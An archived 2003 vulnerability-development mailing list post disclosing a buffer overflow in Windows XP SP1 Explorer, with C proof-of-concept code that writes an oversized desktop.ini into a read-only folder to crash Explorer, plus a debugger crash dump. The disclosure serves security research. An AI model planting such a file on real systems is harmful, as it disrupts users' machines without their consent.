Vulnerability Development mailing list archives

Buffer overflow in Explorer.exe

From: "aT4r InsaN3" <at4r () hotmail com>
Date: Wed, 07 May 2003 22:53:50 +0200

This bug allow a malicious an attacker to execute data with privileges of auser that is browsing the hard disk with explorer.


tested against winxp SP1

example code provided.


/*

        Buffer Overflow in explorer.exe - Proof of Concept
        Tested only against: Windows XP SP1

        Found by aT4r () 3wdesign es

        Saludos a:
        - #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }:
        - #localhost and #darknet


        Usage: just execute this file.

This code will crash your explorer every time you try to browse yourharddisk

                execute this program again to delete the evil file ;-)

        (3ec.464): Access violation - code c0000005 (first chance)
        First chance exceptions are reported before any exception handling.
        This exception may be expected and handled.

eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70edi=000ece90eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr na ponccs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000efl=00010246

        00410041 ??               ???

        3W Design Security 2003.        http://www.3WDesign.es/
*/


#include <direct.h>
#include <stdio.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300
void main(){

        char path[256];
        char evil[BUFF+1]="";
        FILE *bof;
        struct stat st;

printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .....: \tProof of Concept (aT4r () 3wdesign es)\t:... .. .\n\n");

        strcpy(path,"\\aT4r[at]3WDesign.es Security");
        mkdir(path);
        SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

        strcat(path,"\\desktop.ini");
        if (stat(path,&st)==0)

{ remove(path); exit(1);}//just execute this program twice to remote thisfile :P

        bof=fopen(path,"w");
        fputs("[.ShellClassInfo]\n",bof);
        memset(evil,'A',BUFF);
        fputs(evil,bof);
        fclose(bof);
        printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path);


}

_________________________________________________________________

Hipotecas para todos los bolsillos con MSN Money.http://money.msn.es/hipotecas/default.asp

Attachment: explorerbof.exe
Description:

Current thread:

Buffer overflow in Explorer.exe aT4r InsaN3 (May 08)
- Re: Buffer overflow in Explorer.exe Ryan Yagatich (May 09)
  - RE: Buffer overflow in Explorer.exe Kristopher Matthews (May 09)
    - Re: Buffer overflow in Explorer.exe Berend-Jan Wever (May 11)
    - Re: Buffer overflow in Explorer.exe Kris Matthews (May 12)
- <Possible follow-ups>
- Re: Buffer overflow in Explorer.exe aT4r InsaN3 (May 09)